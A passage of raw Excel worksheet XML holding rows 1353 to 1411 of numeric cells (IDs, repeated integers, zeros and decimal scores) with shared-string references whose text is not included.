        <v>2671</v>
      </c>
    </row>
    <row r="1353" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1353" s="1">
        <v>1351</v>
      </c>
      <c r="B1353">
        <v>7514</v>
      </c>
      <c r="C1353">
        <v>7514</v>
      </c>
      <c r="D1353">
        <v>0</v>
      </c>
      <c r="E1353">
        <v>0.73540002107620239</v>
      </c>
      <c r="F1353" t="s">
        <v>7</v>
      </c>
      <c r="G1353" t="s">
        <v>2672</v>
      </c>
      <c r="H1353" t="s">
        <v>2673</v>
      </c>
    </row>
    <row r="1354" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1354" s="1">
        <v>1352</v>
      </c>
      <c r="B1354">
        <v>142</v>
      </c>
      <c r="C1354">
        <v>142</v>
      </c>
      <c r="D1354">
        <v>0</v>
      </c>
      <c r="E1354">
        <v>0.80349999666213989</v>
      </c>
      <c r="F1354" t="s">
        <v>7</v>
      </c>
      <c r="G1354" t="s">
        <v>2674</v>
      </c>
      <c r="H1354" t="s">
        <v>2675</v>
      </c>
    </row>
    <row r="1355" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1355" s="1">
        <v>1353</v>
      </c>
      <c r="B1355">
        <v>143</v>
      </c>
      <c r="C1355">
        <v>143</v>
      </c>
      <c r="D1355">
        <v>0</v>
      </c>
      <c r="E1355">
        <v>0.61919999122619629</v>
      </c>
      <c r="F1355" t="s">
        <v>7</v>
      </c>
      <c r="G1355" t="s">
        <v>2676</v>
      </c>
      <c r="H1355" t="s">
        <v>2677</v>
      </c>
    </row>
    <row r="1356" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1356" s="1">
        <v>1354</v>
      </c>
      <c r="B1356">
        <v>5103</v>
      </c>
      <c r="C1356">
        <v>5103</v>
      </c>
      <c r="D1356">
        <v>0</v>
      </c>
      <c r="E1356">
        <v>0.78549998998641968</v>
      </c>
      <c r="F1356" t="s">
        <v>7</v>
      </c>
      <c r="G1356" t="s">
        <v>2678</v>
      </c>
      <c r="H1356" t="s">
        <v>2679</v>
      </c>
    </row>
    <row r="1357" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1357" s="1">
        <v>1355</v>
      </c>
      <c r="B1357">
        <v>7516</v>
      </c>
      <c r="C1357">
        <v>7516</v>
      </c>
      <c r="D1357">
        <v>0</v>
      </c>
      <c r="E1357">
        <v>0.91210001707077026</v>
      </c>
      <c r="F1357" t="s">
        <v>7</v>
      </c>
      <c r="G1357" t="s">
        <v>2680</v>
      </c>
      <c r="H1357" t="s">
        <v>2681</v>
      </c>
    </row>
    <row r="1358" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1358" s="1">
        <v>1356</v>
      </c>
      <c r="B1358">
        <v>145</v>
      </c>
      <c r="C1358">
        <v>145</v>
      </c>
      <c r="D1358">
        <v>0</v>
      </c>
      <c r="E1358">
        <v>0.73600000143051147</v>
      </c>
      <c r="F1358" t="s">
        <v>7</v>
      </c>
      <c r="G1358" t="s">
        <v>2682</v>
      </c>
      <c r="H1358" t="s">
        <v>2683</v>
      </c>
    </row>
    <row r="1359" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1359" s="1">
        <v>1357</v>
      </c>
      <c r="B1359">
        <v>874</v>
      </c>
      <c r="C1359">
        <v>874</v>
      </c>
      <c r="D1359">
        <v>0</v>
      </c>
      <c r="E1359">
        <v>0.76719999313354492</v>
      </c>
      <c r="F1359" t="s">
        <v>7</v>
      </c>
      <c r="G1359" t="s">
        <v>2684</v>
      </c>
      <c r="H1359" t="s">
        <v>2685</v>
      </c>
    </row>
    <row r="1360" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1360" s="1">
        <v>1358</v>
      </c>
      <c r="B1360">
        <v>5785</v>
      </c>
      <c r="C1360">
        <v>5785</v>
      </c>
      <c r="D1360">
        <v>0</v>
      </c>
      <c r="E1360">
        <v>0.83179998397827148</v>
      </c>
      <c r="F1360" t="s">
        <v>7</v>
      </c>
      <c r="G1360" t="s">
        <v>2686</v>
      </c>
      <c r="H1360" t="s">
        <v>2687</v>
      </c>
    </row>
    <row r="1361" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1361" s="1">
        <v>1359</v>
      </c>
      <c r="B1361">
        <v>5108</v>
      </c>
      <c r="C1361">
        <v>5108</v>
      </c>
      <c r="D1361">
        <v>0</v>
      </c>
      <c r="E1361">
        <v>0.63550001382827759</v>
      </c>
      <c r="F1361" t="s">
        <v>7</v>
      </c>
      <c r="G1361" t="s">
        <v>2688</v>
      </c>
      <c r="H1361" t="s">
        <v>2689</v>
      </c>
    </row>
    <row r="1362" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1362" s="1">
        <v>1360</v>
      </c>
      <c r="B1362">
        <v>270</v>
      </c>
      <c r="C1362">
        <v>270</v>
      </c>
      <c r="D1362">
        <v>0</v>
      </c>
      <c r="E1362">
        <v>0.87919998168945313</v>
      </c>
      <c r="F1362" t="s">
        <v>7</v>
      </c>
      <c r="G1362" t="s">
        <v>2690</v>
      </c>
      <c r="H1362" t="s">
        <v>2691</v>
      </c>
    </row>
    <row r="1363" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1363" s="1">
        <v>1361</v>
      </c>
      <c r="B1363">
        <v>7672</v>
      </c>
      <c r="C1363">
        <v>7672</v>
      </c>
      <c r="D1363">
        <v>0</v>
      </c>
      <c r="E1363">
        <v>0.67009997367858887</v>
      </c>
      <c r="F1363" t="s">
        <v>7</v>
      </c>
      <c r="G1363" t="s">
        <v>2692</v>
      </c>
      <c r="H1363" t="s">
        <v>2693</v>
      </c>
    </row>
    <row r="1364" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1364" s="1">
        <v>1362</v>
      </c>
      <c r="B1364">
        <v>7862</v>
      </c>
      <c r="C1364">
        <v>7862</v>
      </c>
      <c r="D1364">
        <v>0</v>
      </c>
      <c r="E1364">
        <v>0.48039999604225159</v>
      </c>
      <c r="F1364" t="s">
        <v>7</v>
      </c>
      <c r="G1364" t="s">
        <v>2694</v>
      </c>
      <c r="H1364" t="s">
        <v>2695</v>
      </c>
    </row>
    <row r="1365" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1365" s="1">
        <v>1363</v>
      </c>
      <c r="B1365">
        <v>5779</v>
      </c>
      <c r="C1365">
        <v>5779</v>
      </c>
      <c r="D1365">
        <v>0</v>
      </c>
      <c r="E1365">
        <v>0.49390000104904169</v>
      </c>
      <c r="F1365" t="s">
        <v>7</v>
      </c>
      <c r="G1365" t="s">
        <v>2696</v>
      </c>
      <c r="H1365" t="s">
        <v>2697</v>
      </c>
    </row>
    <row r="1366" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1366" s="1">
        <v>1364</v>
      </c>
      <c r="B1366">
        <v>5602</v>
      </c>
      <c r="C1366">
        <v>5602</v>
      </c>
      <c r="D1366">
        <v>0</v>
      </c>
      <c r="E1366">
        <v>0.99699997901916504</v>
      </c>
      <c r="F1366" t="s">
        <v>7</v>
      </c>
      <c r="G1366" t="s">
        <v>2698</v>
      </c>
      <c r="H1366" t="s">
        <v>2699</v>
      </c>
    </row>
    <row r="1367" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1367" s="1">
        <v>1365</v>
      </c>
      <c r="B1367">
        <v>7521</v>
      </c>
      <c r="C1367">
        <v>7521</v>
      </c>
      <c r="D1367">
        <v>0</v>
      </c>
      <c r="E1367">
        <v>0.76289999485015869</v>
      </c>
      <c r="F1367" t="s">
        <v>7</v>
      </c>
      <c r="G1367" t="s">
        <v>2700</v>
      </c>
      <c r="H1367" t="s">
        <v>2701</v>
      </c>
    </row>
    <row r="1368" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1368" s="1">
        <v>1366</v>
      </c>
      <c r="B1368">
        <v>5776</v>
      </c>
      <c r="C1368">
        <v>5776</v>
      </c>
      <c r="D1368">
        <v>0</v>
      </c>
      <c r="E1368">
        <v>0.52179998159408569</v>
      </c>
      <c r="F1368" t="s">
        <v>7</v>
      </c>
      <c r="G1368" t="s">
        <v>2702</v>
      </c>
      <c r="H1368" t="s">
        <v>2703</v>
      </c>
    </row>
    <row r="1369" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1369" s="1">
        <v>1367</v>
      </c>
      <c r="B1369">
        <v>5116</v>
      </c>
      <c r="C1369">
        <v>5116</v>
      </c>
      <c r="D1369">
        <v>0</v>
      </c>
      <c r="E1369">
        <v>0.71329998970031738</v>
      </c>
      <c r="F1369" t="s">
        <v>7</v>
      </c>
      <c r="G1369" t="s">
        <v>2704</v>
      </c>
      <c r="H1369" t="s">
        <v>2705</v>
      </c>
    </row>
    <row r="1370" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1370" s="1">
        <v>1368</v>
      </c>
      <c r="B1370">
        <v>273</v>
      </c>
      <c r="C1370">
        <v>273</v>
      </c>
      <c r="D1370">
        <v>0</v>
      </c>
      <c r="E1370">
        <v>0.53430002927780151</v>
      </c>
      <c r="F1370" t="s">
        <v>7</v>
      </c>
      <c r="G1370" t="s">
        <v>2706</v>
      </c>
      <c r="H1370" t="s">
        <v>2707</v>
      </c>
    </row>
    <row r="1371" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1371" s="1">
        <v>1369</v>
      </c>
      <c r="B1371">
        <v>7513</v>
      </c>
      <c r="C1371">
        <v>7513</v>
      </c>
      <c r="D1371">
        <v>0</v>
      </c>
      <c r="E1371">
        <v>0.76679998636245728</v>
      </c>
      <c r="F1371" t="s">
        <v>7</v>
      </c>
      <c r="G1371" t="s">
        <v>2708</v>
      </c>
      <c r="H1371" t="s">
        <v>2709</v>
      </c>
    </row>
    <row r="1372" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1372" s="1">
        <v>1370</v>
      </c>
      <c r="B1372">
        <v>274</v>
      </c>
      <c r="C1372">
        <v>274</v>
      </c>
      <c r="D1372">
        <v>0</v>
      </c>
      <c r="E1372">
        <v>0.70840001106262207</v>
      </c>
      <c r="F1372" t="s">
        <v>7</v>
      </c>
      <c r="G1372" t="s">
        <v>2710</v>
      </c>
      <c r="H1372" t="s">
        <v>2711</v>
      </c>
    </row>
    <row r="1373" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1373" s="1">
        <v>1371</v>
      </c>
      <c r="B1373">
        <v>884</v>
      </c>
      <c r="C1373">
        <v>884</v>
      </c>
      <c r="D1373">
        <v>0</v>
      </c>
      <c r="E1373">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1373" t="s">
        <v>7</v>
      </c>
      <c r="G1373" t="s">
        <v>2712</v>
      </c>
      <c r="H1373" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="1374" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1374" s="1">
        <v>1372</v>
      </c>
      <c r="B1374">
        <v>563</v>
      </c>
      <c r="C1374">
        <v>563</v>
      </c>
      <c r="D1374">
        <v>0</v>
      </c>
      <c r="E1374">
        <v>0.54149997234344482</v>
      </c>
      <c r="F1374" t="s">
        <v>7</v>
      </c>
      <c r="G1374" t="s">
        <v>2713</v>
      </c>
      <c r="H1374" t="s">
        <v>2714</v>
      </c>
    </row>
    <row r="1375" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1375" s="1">
        <v>1373</v>
      </c>
      <c r="B1375">
        <v>5087</v>
      </c>
      <c r="C1375">
        <v>5087</v>
      </c>
      <c r="D1375">
        <v>0</v>
      </c>
      <c r="E1375">
        <v>0.92309999465942383</v>
      </c>
      <c r="F1375" t="s">
        <v>7</v>
      </c>
      <c r="G1375" t="s">
        <v>2715</v>
      </c>
      <c r="H1375" t="s">
        <v>2716</v>
      </c>
    </row>
    <row r="1376" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1376" s="1">
        <v>1374</v>
      </c>
      <c r="B1376">
        <v>900</v>
      </c>
      <c r="C1376">
        <v>900</v>
      </c>
      <c r="D1376">
        <v>0</v>
      </c>
      <c r="E1376">
        <v>0.46360000967979431</v>
      </c>
      <c r="F1376" t="s">
        <v>7</v>
      </c>
      <c r="G1376" t="s">
        <v>2717</v>
      </c>
      <c r="H1376" t="s">
        <v>2718</v>
      </c>
    </row>
    <row r="1377" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1377" s="1">
        <v>1375</v>
      </c>
      <c r="B1377">
        <v>128</v>
      </c>
      <c r="C1377">
        <v>128</v>
      </c>
      <c r="D1377">
        <v>0</v>
      </c>
      <c r="E1377">
        <v>0.99650001525878906</v>
      </c>
      <c r="F1377" t="s">
        <v>7</v>
      </c>
      <c r="G1377" t="s">
        <v>2719</v>
      </c>
      <c r="H1377" t="s">
        <v>2720</v>
      </c>
    </row>
    <row r="1378" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1378" s="1">
        <v>1376</v>
      </c>
      <c r="B1378">
        <v>5427</v>
      </c>
      <c r="C1378">
        <v>5427</v>
      </c>
      <c r="D1378">
        <v>0</v>
      </c>
      <c r="E1378">
        <v>0.83639997243881226</v>
      </c>
      <c r="F1378" t="s">
        <v>7</v>
      </c>
      <c r="G1378" t="s">
        <v>2721</v>
      </c>
      <c r="H1378" t="s">
        <v>2722</v>
      </c>
    </row>
    <row r="1379" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1379" s="1">
        <v>1377</v>
      </c>
      <c r="B1379">
        <v>898</v>
      </c>
      <c r="C1379">
        <v>898</v>
      </c>
      <c r="D1379">
        <v>0</v>
      </c>
      <c r="E1379">
        <v>0.5250999927520752</v>
      </c>
      <c r="F1379" t="s">
        <v>7</v>
      </c>
      <c r="G1379" t="s">
        <v>2723</v>
      </c>
      <c r="H1379" t="s">
        <v>2724</v>
      </c>
    </row>
    <row r="1380" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1380" s="1">
        <v>1378</v>
      </c>
      <c r="B1380">
        <v>5277</v>
      </c>
      <c r="C1380">
        <v>5277</v>
      </c>
      <c r="D1380">
        <v>0</v>
      </c>
      <c r="E1380">
        <v>0.99250000715255737</v>
      </c>
      <c r="F1380" t="s">
        <v>7</v>
      </c>
      <c r="G1380" t="s">
        <v>2725</v>
      </c>
      <c r="H1380" t="s">
        <v>2726</v>
      </c>
    </row>
    <row r="1381" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1381" s="1">
        <v>1379</v>
      </c>
      <c r="B1381">
        <v>132</v>
      </c>
      <c r="C1381">
        <v>132</v>
      </c>
      <c r="D1381">
        <v>0</v>
      </c>
      <c r="E1381">
        <v>0.98360002040863037</v>
      </c>
      <c r="F1381" t="s">
        <v>7</v>
      </c>
      <c r="G1381" t="s">
        <v>2727</v>
      </c>
      <c r="H1381" t="s">
        <v>2728</v>
      </c>
    </row>
    <row r="1382" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1382" s="1">
        <v>1380</v>
      </c>
      <c r="B1382">
        <v>133</v>
      </c>
      <c r="C1382">
        <v>133</v>
      </c>
      <c r="D1382">
        <v>0</v>
      </c>
      <c r="E1382">
        <v>0.91449999809265137</v>
      </c>
      <c r="F1382" t="s">
        <v>7</v>
      </c>
      <c r="G1382" t="s">
        <v>2729</v>
      </c>
      <c r="H1382" t="s">
        <v>2730</v>
      </c>
    </row>
    <row r="1383" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1383" s="1">
        <v>1381</v>
      </c>
      <c r="B1383">
        <v>280</v>
      </c>
      <c r="C1383">
        <v>280</v>
      </c>
      <c r="D1383">
        <v>0</v>
      </c>
      <c r="E1383">
        <v>0.49380001425743097</v>
      </c>
      <c r="F1383" t="s">
        <v>7</v>
      </c>
      <c r="G1383" t="s">
        <v>2731</v>
      </c>
      <c r="H1383" t="s">
        <v>2732</v>
      </c>
    </row>
    <row r="1384" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1384" s="1">
        <v>1382</v>
      </c>
      <c r="B1384">
        <v>5279</v>
      </c>
      <c r="C1384">
        <v>5279</v>
      </c>
      <c r="D1384">
        <v>0</v>
      </c>
      <c r="E1384">
        <v>0.96630001068115234</v>
      </c>
      <c r="F1384" t="s">
        <v>7</v>
      </c>
      <c r="G1384" t="s">
        <v>2733</v>
      </c>
      <c r="H1384" t="s">
        <v>2734</v>
      </c>
    </row>
    <row r="1385" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1385" s="1">
        <v>1383</v>
      </c>
      <c r="B1385">
        <v>134</v>
      </c>
      <c r="C1385">
        <v>134</v>
      </c>
      <c r="D1385">
        <v>0</v>
      </c>
      <c r="E1385">
        <v>0.88940000534057617</v>
      </c>
      <c r="F1385" t="s">
        <v>7</v>
      </c>
      <c r="G1385" t="s">
        <v>2735</v>
      </c>
      <c r="H1385" t="s">
        <v>2736</v>
      </c>
    </row>
    <row r="1386" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1386" s="1">
        <v>1384</v>
      </c>
      <c r="B1386">
        <v>279</v>
      </c>
      <c r="C1386">
        <v>279</v>
      </c>
      <c r="D1386">
        <v>0</v>
      </c>
      <c r="E1386">
        <v>0.4830000102519989</v>
      </c>
      <c r="F1386" t="s">
        <v>7</v>
      </c>
      <c r="G1386" t="s">
        <v>2737</v>
      </c>
      <c r="H1386" t="s">
        <v>2738</v>
      </c>
    </row>
    <row r="1387" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1387" s="1">
        <v>1385</v>
      </c>
      <c r="B1387">
        <v>278</v>
      </c>
      <c r="C1387">
        <v>278</v>
      </c>
      <c r="D1387">
        <v>0</v>
      </c>
      <c r="E1387">
        <v>0.56029999256134033</v>
      </c>
      <c r="F1387" t="s">
        <v>7</v>
      </c>
      <c r="G1387" t="s">
        <v>2739</v>
      </c>
      <c r="H1387" t="s">
        <v>2740</v>
      </c>
    </row>
    <row r="1388" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1388" s="1">
        <v>1386</v>
      </c>
      <c r="B1388">
        <v>135</v>
      </c>
      <c r="C1388">
        <v>135</v>
      </c>
      <c r="D1388">
        <v>0</v>
      </c>
      <c r="E1388">
        <v>0.64200001955032349</v>
      </c>
      <c r="F1388" t="s">
        <v>7</v>
      </c>
      <c r="G1388" t="s">
        <v>2741</v>
      </c>
      <c r="H1388" t="s">
        <v>2742</v>
      </c>
    </row>
    <row r="1389" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1389" s="1">
        <v>1387</v>
      </c>
      <c r="B1389">
        <v>891</v>
      </c>
      <c r="C1389">
        <v>891</v>
      </c>
      <c r="D1389">
        <v>0</v>
      </c>
      <c r="E1389">
        <v>0.68339997529983521</v>
      </c>
      <c r="F1389" t="s">
        <v>7</v>
      </c>
      <c r="G1389" t="s">
        <v>2743</v>
      </c>
      <c r="H1389" t="s">
        <v>2744</v>
      </c>
    </row>
    <row r="1390" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1390" s="1">
        <v>1388</v>
      </c>
      <c r="B1390">
        <v>5095</v>
      </c>
      <c r="C1390">
        <v>5095</v>
      </c>
      <c r="D1390">
        <v>0</v>
      </c>
      <c r="E1390">
        <v>0.68029999732971191</v>
      </c>
      <c r="F1390" t="s">
        <v>7</v>
      </c>
      <c r="G1390" t="s">
        <v>2745</v>
      </c>
      <c r="H1390" t="s">
        <v>2746</v>
      </c>
    </row>
    <row r="1391" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1391" s="1">
        <v>1389</v>
      </c>
      <c r="B1391">
        <v>136</v>
      </c>
      <c r="C1391">
        <v>136</v>
      </c>
      <c r="D1391">
        <v>0</v>
      </c>
      <c r="E1391">
        <v>0.76599997282028198</v>
      </c>
      <c r="F1391" t="s">
        <v>7</v>
      </c>
      <c r="G1391" t="s">
        <v>2747</v>
      </c>
      <c r="H1391" t="s">
        <v>2748</v>
      </c>
    </row>
    <row r="1392" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1392" s="1">
        <v>1390</v>
      </c>
      <c r="B1392">
        <v>7673</v>
      </c>
      <c r="C1392">
        <v>7673</v>
      </c>
      <c r="D1392">
        <v>0</v>
      </c>
      <c r="E1392">
        <v>0.99690002202987671</v>
      </c>
      <c r="F1392" t="s">
        <v>7</v>
      </c>
      <c r="G1392" t="s">
        <v>2749</v>
      </c>
      <c r="H1392" t="s">
        <v>2750</v>
      </c>
    </row>
    <row r="1393" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1393" s="1">
        <v>1391</v>
      </c>
      <c r="B1393">
        <v>5789</v>
      </c>
      <c r="C1393">
        <v>5789</v>
      </c>
      <c r="D1393">
        <v>0</v>
      </c>
      <c r="E1393">
        <v>0.97189998626708984</v>
      </c>
      <c r="F1393" t="s">
        <v>7</v>
      </c>
      <c r="G1393" t="s">
        <v>2751</v>
      </c>
      <c r="H1393" t="s">
        <v>2752</v>
      </c>
    </row>
    <row r="1394" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1394" s="1">
        <v>1392</v>
      </c>
      <c r="B1394">
        <v>5100</v>
      </c>
      <c r="C1394">
        <v>5100</v>
      </c>
      <c r="D1394">
        <v>0</v>
      </c>
      <c r="E1394">
        <v>0.64910000562667847</v>
      </c>
      <c r="F1394" t="s">
        <v>7</v>
      </c>
      <c r="G1394" t="s">
        <v>2753</v>
      </c>
      <c r="H1394" t="s">
        <v>2754</v>
      </c>
    </row>
    <row r="1395" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1395" s="1">
        <v>1393</v>
      </c>
      <c r="B1395">
        <v>276</v>
      </c>
      <c r="C1395">
        <v>276</v>
      </c>
      <c r="D1395">
        <v>0</v>
      </c>
      <c r="E1395">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1395" t="s">
        <v>7</v>
      </c>
      <c r="G1395" t="s">
        <v>2755</v>
      </c>
      <c r="H1395" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="1396" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1396" s="1">
        <v>1394</v>
      </c>
      <c r="B1396">
        <v>7674</v>
      </c>
      <c r="C1396">
        <v>7674</v>
      </c>
      <c r="D1396">
        <v>0</v>
      </c>
      <c r="E1396">
        <v>0.80989998579025269</v>
      </c>
      <c r="F1396" t="s">
        <v>7</v>
      </c>
      <c r="G1396" t="s">
        <v>2756</v>
      </c>
      <c r="H1396" t="s">
        <v>2757</v>
      </c>
    </row>
    <row r="1397" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1397" s="1">
        <v>1395</v>
      </c>
      <c r="B1397">
        <v>7524</v>
      </c>
      <c r="C1397">
        <v>7524</v>
      </c>
      <c r="D1397">
        <v>0</v>
      </c>
      <c r="E1397">
        <v>0.54070001840591431</v>
      </c>
      <c r="F1397" t="s">
        <v>7</v>
      </c>
      <c r="G1397" t="s">
        <v>2758</v>
      </c>
      <c r="H1397" t="s">
        <v>2759</v>
      </c>
    </row>
    <row r="1398" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1398" s="1">
        <v>1396</v>
      </c>
      <c r="B1398">
        <v>5051</v>
      </c>
      <c r="C1398">
        <v>5051</v>
      </c>
      <c r="D1398">
        <v>0</v>
      </c>
      <c r="E1398">
        <v>0.69590002298355103</v>
      </c>
      <c r="F1398" t="s">
        <v>7</v>
      </c>
      <c r="G1398" t="s">
        <v>2760</v>
      </c>
      <c r="H1398" t="s">
        <v>2761</v>
      </c>
    </row>
    <row r="1399" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1399" s="1">
        <v>1397</v>
      </c>
      <c r="B1399">
        <v>539</v>
      </c>
      <c r="C1399">
        <v>539</v>
      </c>
      <c r="D1399">
        <v>0</v>
      </c>
      <c r="E1399">
        <v>0.94849997758865356</v>
      </c>
      <c r="F1399" t="s">
        <v>7</v>
      </c>
      <c r="G1399" t="s">
        <v>2762</v>
      </c>
      <c r="H1399" t="s">
        <v>2763</v>
      </c>
    </row>
    <row r="1400" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1400" s="1">
        <v>1398</v>
      </c>
      <c r="B1400">
        <v>5008</v>
      </c>
      <c r="C1400">
        <v>5008</v>
      </c>
      <c r="D1400">
        <v>0</v>
      </c>
      <c r="E1400">
        <v>0.86680001020431519</v>
      </c>
      <c r="F1400" t="s">
        <v>7</v>
      </c>
      <c r="G1400" t="s">
        <v>2764</v>
      </c>
      <c r="H1400" t="s">
        <v>2765</v>
      </c>
    </row>
    <row r="1401" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1401" s="1">
        <v>1399</v>
      </c>
      <c r="B1401">
        <v>5590</v>
      </c>
      <c r="C1401">
        <v>5590</v>
      </c>
      <c r="D1401">
        <v>0</v>
      </c>
      <c r="E1401">
        <v>0.67979997396469116</v>
      </c>
      <c r="F1401" t="s">
        <v>7</v>
      </c>
      <c r="G1401" t="s">
        <v>2766</v>
      </c>
      <c r="H1401" t="s">
        <v>2767</v>
      </c>
    </row>
    <row r="1402" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1402" s="1">
        <v>1400</v>
      </c>
      <c r="B1402">
        <v>7694</v>
      </c>
      <c r="C1402">
        <v>7694</v>
      </c>
      <c r="D1402">
        <v>0</v>
      </c>
      <c r="E1402">
        <v>0.93889999389648438</v>
      </c>
      <c r="F1402" t="s">
        <v>7</v>
      </c>
      <c r="G1402" t="s">
        <v>2768</v>
      </c>
      <c r="H1402" t="s">
        <v>2769</v>
      </c>
    </row>
    <row r="1403" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1403" s="1">
        <v>1401</v>
      </c>
      <c r="B1403">
        <v>5009</v>
      </c>
      <c r="C1403">
        <v>5009</v>
      </c>
      <c r="D1403">
        <v>0</v>
      </c>
      <c r="E1403">
        <v>0.46700000762939448</v>
      </c>
      <c r="F1403" t="s">
        <v>7</v>
      </c>
      <c r="G1403" t="s">
        <v>2770</v>
      </c>
      <c r="H1403" t="s">
        <v>2771</v>
      </c>
    </row>
    <row r="1404" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1404" s="1">
        <v>1402</v>
      </c>
      <c r="B1404">
        <v>7693</v>
      </c>
      <c r="C1404">
        <v>7693</v>
      </c>
      <c r="D1404">
        <v>0</v>
      </c>
      <c r="E1404">
        <v>0.99839997291564941</v>
      </c>
      <c r="F1404" t="s">
        <v>7</v>
      </c>
      <c r="G1404" t="s">
        <v>2772</v>
      </c>
      <c r="H1404" t="s">
        <v>2773</v>
      </c>
    </row>
    <row r="1405" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1405" s="1">
        <v>1403</v>
      </c>
      <c r="B1405">
        <v>5011</v>
      </c>
      <c r="C1405">
        <v>5011</v>
      </c>
      <c r="D1405">
        <v>0</v>
      </c>
      <c r="E1405">
        <v>0.98070001602172852</v>
      </c>
      <c r="F1405" t="s">
        <v>7</v>
      </c>
      <c r="G1405" t="s">
        <v>2774</v>
      </c>
      <c r="H1405" t="s">
        <v>2775</v>
      </c>
    </row>
    <row r="1406" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1406" s="1">
        <v>1404</v>
      </c>
      <c r="B1406">
        <v>5803</v>
      </c>
      <c r="C1406">
        <v>5803</v>
      </c>
      <c r="D1406">
        <v>0</v>
      </c>
      <c r="E1406">
        <v>0.98229998350143433</v>
      </c>
      <c r="F1406" t="s">
        <v>7</v>
      </c>
      <c r="G1406" t="s">
        <v>2776</v>
      </c>
      <c r="H1406" t="s">
        <v>2777</v>
      </c>
    </row>
    <row r="1407" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1407" s="1">
        <v>1405</v>
      </c>
      <c r="B1407">
        <v>5013</v>
      </c>
      <c r="C1407">
        <v>5013</v>
      </c>
      <c r="D1407">
        <v>0</v>
      </c>
      <c r="E1407">
        <v>0.47459998726844788</v>
      </c>
      <c r="F1407" t="s">
        <v>7</v>
      </c>
      <c r="G1407" t="s">
        <v>2778</v>
      </c>
      <c r="H1407" t="s">
        <v>2779</v>
      </c>
    </row>
    <row r="1408" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1408" s="1">
        <v>1406</v>
      </c>
      <c r="B1408">
        <v>1017</v>
      </c>
      <c r="C1408">
        <v>1017</v>
      </c>
      <c r="D1408">
        <v>0</v>
      </c>
      <c r="E1408">
        <v>0.5845000147819519</v>
      </c>
      <c r="F1408" t="s">
        <v>7</v>
      </c>
      <c r="G1408" t="s">
        <v>2780</v>
      </c>
      <c r="H1408" t="s">
        <v>2781</v>
      </c>
    </row>
    <row r="1409" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1409" s="1">
        <v>1407</v>
      </c>
      <c r="B1409">
        <v>83</v>
      </c>
      <c r="C1409">
        <v>83</v>
      </c>
      <c r="D1409">
        <v>0</v>
      </c>
      <c r="E1409">
        <v>0.90659999847412109</v>
      </c>
      <c r="F1409" t="s">
        <v>7</v>
      </c>
      <c r="G1409" t="s">
        <v>2782</v>
      </c>
      <c r="H1409" t="s">
        <v>2783</v>
      </c>
    </row>
    <row r="1410" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1410" s="1">
        <v>1408</v>
      </c>
      <c r="B1410">
        <v>1016</v>
      </c>
      <c r="C1410">
        <v>1016</v>
      </c>
      <c r="D1410">
        <v>0</v>
      </c>
      <c r="E1410">
        <v>0.58289998769760132</v>
      </c>
      <c r="F1410" t="s">
        <v>7</v>
      </c>
      <c r="G1410" t="s">
        <v>2784</v>
      </c>
      <c r="H1410" t="s">
        <v>2785</v>
      </c>
    </row>
    <row r="1411" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1411" s="1">
        <v>1409</v>
      </c>
      <c r="B1411">
        <v>7449</v>
      </c>
      <c r="C1411">
        <v>7449</v>
      </c>
      <c r="D1411">
        <v>0</v>
      </c>
      <c r="E1411">
        <v>0.99489998817443848</v>
      </c>
      <c r="F1411" t="s">
